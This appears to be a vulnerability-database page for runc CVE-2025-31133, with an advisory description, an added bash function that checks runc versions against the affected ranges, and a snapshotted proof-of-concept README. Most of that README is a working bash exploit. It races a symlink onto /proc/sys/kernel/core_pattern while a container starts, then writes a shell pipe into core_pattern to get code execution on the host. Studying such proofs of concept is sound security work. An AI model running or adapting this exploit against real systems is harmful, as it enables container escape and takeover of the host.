Associated Vulnerability
Title: runc security vulnerability (CVE-2025-31133)
Description: runc is an open-source CLI tool from the Open Container Initiative for spawning and running containers according to the OCI specification. runc versions 1.2.7 and earlier, 1.3.0-rc.1 through 1.3.1, 1.4.0-rc.1 and 1.4.0-rc.2 contain a security vulnerability caused by insufficient verification of the authenticity of bind-mount sources, which may lead to host information disclosure, host denial of service, container escape, or a bypass of maskedPaths.
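As an added example that is not part of this PoC repository, the following shell functions take a runc version string (or the output of `runc --version`) and report whether it falls inside the affected ranges exactly as the description above lists them; the function names and the ordering of `rc.N` pre-releases below the final release are this example's own assumptions.

```bash
#!/bin/bash
# Added example, not from the PoC repository: classify a runc version against the
# affected ranges given in the description (<= 1.2.7, 1.3.0-rc.1 through 1.3.1,
# 1.4.0-rc.1 and 1.4.0-rc.2). Assumption: "rc.N" sorts before the final release.

# Turn "vMAJOR.MINOR.PATCH[-rc.N]" into "MAJOR MINOR PATCH RC" (RC=99 for a final release).
runc_version_key() {
  local v="${1#v}" base pre rc=99 f
  base="${v%%-*}"
  case "$v" in *-*) pre="${v#*-}" ;; *) pre="" ;; esac
  if [ -n "$pre" ]; then
    case "$pre" in rc.[0-9]*) rc="${pre#rc.}" ;; *) return 1 ;; esac
  fi
  local IFS=.
  set -- $base
  [ $# -eq 3 ] || return 1
  for f in "$1" "$2" "$3" "$rc"; do
    case "$f" in ''|*[!0-9]*) return 1 ;; esac   # every field must be a plain integer
  done
  printf '%s %s %s %s\n' "$1" "$2" "$3" "$rc"
}

# Extract the version from `runc --version` output, whose first line reads "runc version X.Y.Z".
runc_version_from_output() {
  printf '%s\n' "$1" | awk '/^runc version /{print $3; exit}'
}

# Print affected / not-affected / unknown; exit status 0 / 1 / 2 respectively.
runc_affected() {
  local key maj min pat rc hit=0
  key="$(runc_version_key "$1")" || { echo unknown; return 2; }
  set -- $key
  maj=$1; min=$2; pat=$3; rc=$4
  # 1.2.7 and earlier
  if [ "$maj" -lt 1 ] || { [ "$maj" -eq 1 ] && [ "$min" -lt 2 ]; } \
     || { [ "$maj" -eq 1 ] && [ "$min" -eq 2 ] && [ "$pat" -le 7 ]; }; then hit=1; fi
  # 1.3.0-rc.1 through 1.3.1
  if [ "$maj" -eq 1 ] && [ "$min" -eq 3 ] && [ "$pat" -le 1 ]; then hit=1; fi
  # 1.4.0-rc.1 and 1.4.0-rc.2 only (1.4.0-rc.3 and the 1.4.0 release are outside the range)
  if [ "$maj" -eq 1 ] && [ "$min" -eq 4 ] && [ "$pat" -eq 0 ] \
     && [ "$rc" -ge 1 ] && [ "$rc" -le 2 ]; then hit=1; fi
  if [ "$hit" -eq 1 ]; then echo affected; return 0; fi
  echo not-affected; return 1
}

# Stand-alone use on a host: runc_affected "$(runc_version_from_output "$(runc --version)")"
```

The classification uses only the ranges stated in the description; check the upstream advisory for the authoritative fixed versions before relying on it.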
Readme
## CVE-2025-31133 runc maskedPaths Exploit PoC
> **WARNING:**
> This PoC attempts host code execution via runc maskedPaths race.
> For educational and authorized lab use only.
```bash
#!/bin/bash
# CVE-2025-31133 runc maskedPaths symlink race exploit
# This PoC performs a real breakout: writes core_pattern to invoke /bin/sh on the host.
# WARNING: This WILL attempt host code execution. Use only in isolated, disposable labs you fully control.
set -euo pipefail
RUNC_BIN="/usr/local/bin/runc"
CONTAINER_ROOTFS="./rootfs"
CONTAINER_NAME="cve31133poc"
echo "[*] runc version: $($RUNC_BIN --version | head -1)"
echo "[*] Make sure this is a known vulnerable runc version (CVE-2025-31133)."
# Fresh rootfs with static /dev
rm -rf "$CONTAINER_ROOTFS"
mkdir -p "$CONTAINER_ROOTFS"/{proc,dev,sys,bin,tmp}
cp /bin/busybox "$CONTAINER_ROOTFS/bin/sh"
chmod +x "$CONTAINER_ROOTFS/bin/sh"
mknod "$CONTAINER_ROOTFS/dev/null" c 1 3
cat > config.json <<EOF
{
  "ociVersion": "1.0.2",
  "process": {
    "terminal": false,
    "user": { "uid": 0, "gid": 0 },
    "args": ["/bin/sh", "-c", "sleep 30"],
    "env": ["PATH=/bin"],
    "cwd": "/"
  },
  "root": { "path": "rootfs", "readonly": false },
  "mounts": [
    { "destination": "/proc", "type": "proc", "source": "proc" },
    { "destination": "/dev", "type": "bind", "source": "dev", "options": ["rbind", "rw"] },
    { "destination": "/sys", "type": "sysfs", "source": "sysfs" }
  ],
  "linux": {
    "namespaces": [
      { "type": "pid" },
      { "type": "network" },
      { "type": "mount" },
      { "type": "ipc" },
      { "type": "uts" }
    ],
    "maskedPaths": [
      "/proc/kcore",
      "/proc/latency_stats",
      "/proc/timer_list",
      "/proc/sched_debug",
      "/sys/firmware",
      "/proc/sys/kernel/core_pattern"
    ]
  }
}
EOF
echo "[*] config.json created (explicit maskedPaths)."
# Start the symlink race BEFORE and DURING runc run
symlink_race() {
  local end=$((SECONDS+20))
  while [ $SECONDS -lt $end ]; do
    rm -f "$CONTAINER_ROOTFS/dev/null"
    ln -s /proc/sys/kernel/core_pattern "$CONTAINER_ROOTFS/dev/null"
    sleep 0.01 2>/dev/null || sleep 1
    rm -f "$CONTAINER_ROOTFS/dev/null"
    mknod "$CONTAINER_ROOTFS/dev/null" c 1 3
    sleep 0.01 2>/dev/null || sleep 1
  done
}
echo "[*] Starting symlink race background process."
symlink_race &
RACE_PID=$!
# Start container while race is active
echo "[*] Launching runc run..."
$RUNC_BIN run --detach --bundle . "$CONTAINER_NAME"
sleep 2
echo "[*] Writing to /proc/sys/kernel/core_pattern in container (real exploit)."
$RUNC_BIN exec "$CONTAINER_NAME" /bin/sh -c 'echo "|/bin/sh -i" > /proc/sys/kernel/core_pattern; kill -ABRT $$'
wait $RACE_PID || true
$RUNC_BIN kill "$CONTAINER_NAME" || true
$RUNC_BIN delete "$CONTAINER_NAME" || true
echo "[+] Exploit attempt complete. If successful, you should now have code exec on the host via core_pattern!"
```
File Snapshot
```
[4.0K] /data/pocs/1b1f165959d96e5263509c79a12713c0f824af9e
└── [2.8K] README.md
1 directory, 1 file
```
Remarks
1. It is advised to access via the original source first.
2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.